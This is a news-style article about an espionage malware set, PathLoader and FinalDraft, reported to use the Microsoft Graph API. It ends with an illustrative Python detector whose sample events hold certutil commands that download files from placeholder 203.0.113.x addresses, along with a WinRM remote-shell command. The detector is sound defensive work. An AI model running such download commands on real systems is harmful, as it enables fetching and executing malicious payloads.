Cybersecurity experts have identified a new threat to organizations: a group of hackers has developed a sophisticated malware family that steals data and uses Microsoft Outlook as a covert communications channel by abusing the Microsoft Graph API. Elastic Security researchers have revealed that this malicious software has the capability to bypass hashed passwords, making it a significant concern for CISOs around the world.
The origins of this malware can be traced back to an unnamed group targeting the foreign ministry of a South American nation, but there are also links to cyberattacks on a university in Southeast Asia and on telecom companies in that region. The researchers describe the campaign as a “well-engineered, highly-capable, novel intrusion set”, indicating a level of sophistication not commonly seen in cyber threats.
The attack against the South American country likely began in November 2024, when Elastic Security detected a series of suspicious endpoint alerts within the Foreign Ministry. The initial point of compromise is still unclear, but the hackers used various tactics to move through the organization’s IT infrastructure. One method involved using the built-in Windows certutil application to download files, showcasing their knowledge of operating system vulnerabilities.
According to the report, the primary motive behind these attacks seems to be espionage, with both Windows and Linux versions of the malware being employed. Despite the hackers demonstrating poor campaign management and inconsistent evasion tactics, the potential impact of their activities should not be underestimated.
CISOs are advised to remain vigilant for signs of similar attacks that reuse the techniques employed by this group. The hackers showed a high level of sophistication by using the Windows Remote Management Remote Shell plugin to download files, including executables, configuration files, and log files. This strategy allowed them to execute malicious code under the guise of trusted binaries, posing a significant challenge for organizations trying to defend against such threats.
The malware used by these attackers comprises a loader and a backdoor, each serving a specific function in the data exfiltration process. PathLoader, the lightweight executable, downloads and executes encrypted shellcode from a remote server while employing anti-analysis techniques to avoid detection. FinalDraft, the 64-bit backdoor, focuses on process injection and on exfiltrating data to a command-and-control server, using tools similar to Mimikatz to handle stolen credentials.
One particularly alarming aspect of this malware is its ability to communicate through the Microsoft Graph API, a technique that cybercriminals are increasingly using to hide their activities inside legitimate cloud traffic. This method allows the malware to capture authentication tokens and potentially evade detection by traditional security measures.
As organizations grapple with the evolving threat landscape, experts recommend deploying detection rules such as those provided by Elastic Security to identify and mitigate the risk of similar attacks. These rules can help defenders spot the presence of PathLoader and FinalDraft on Windows and Linux systems, enabling a proactive response to potential security breaches.
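As an added illustration of what such endpoint detection logic looks like in practice (this is example code written for this article, not Elastic Security’s published rules), the following Python script scans constructed process-creation events for two of the behaviours described above: certutil being used with a URL to download a file, and a child process spawned by the WinRM Remote Shell host process (winrshost.exe). The event records and the 203.0.113.x address are constructed sample data; the field names are assumptions chosen for this example rather than the schema of any particular EDR product.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation event. Field names are an assumption for this example."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (not real data). 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\Users\Public\update.bin"),
    ProcessEvent("ws-01", r"C:\Windows\System32\winrshost.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("ws-02", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Temp\installer.exe SHA256"),   # benign: local hashing
    ProcessEvent("ws-02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe"),                # benign: interactive shell
    ProcessEvent("srv-03", r"C:\Windows\System32\winrshost.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil -urlcache -f https://203.0.113.20/c.cfg C:\ProgramData\c.cfg"),
]

# certutil switches that fetch content from a URL, and a loose URL matcher.
CERTUTIL_FETCH_SWITCH = re.compile(r"(?<!\S)-(?:urlcache|verifyctl)\b", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_certutil_download(ev: ProcessEvent) -> bool:
    """certutil.exe invoked with a URL-fetching switch and an http(s) URL on the command line."""
    return (_basename(ev.image) == "certutil.exe"
            and CERTUTIL_FETCH_SWITCH.search(ev.command_line) is not None
            and URL_PATTERN.search(ev.command_line) is not None)


def is_winrm_shell_child(ev: ProcessEvent) -> bool:
    """Any process whose parent is the WinRM Remote Shell host: a remote command was run."""
    return _basename(ev.parent_image) == "winrshost.exe"


RULES = [
    ("certutil_download", is_certutil_download),
    ("winrm_remote_shell_child", is_winrm_shell_child),
]


def detect(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (host, rule_name) pairs for every rule that fires on every event."""
    hits = []
    for ev in events:
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((ev.host, name))
    return hits


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

In a real deployment the winrshost.exe rule needs an allowlist for hosts where administrators legitimately run commands over WinRM; the value of the rule is that a remote shell on a workstation or on a server that should never be managed this way is a strong signal, while certutil fetching from an external URL is rarely legitimate anywhere.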
In conclusion, the emergence of this new strain of data-stealing malware highlights the need for organizations to enhance their cybersecurity defenses and stay abreast of the latest threat intelligence. By remaining vigilant and implementing robust security measures, businesses can better protect themselves against advanced cyber threats and safeguard their sensitive data from malicious actors.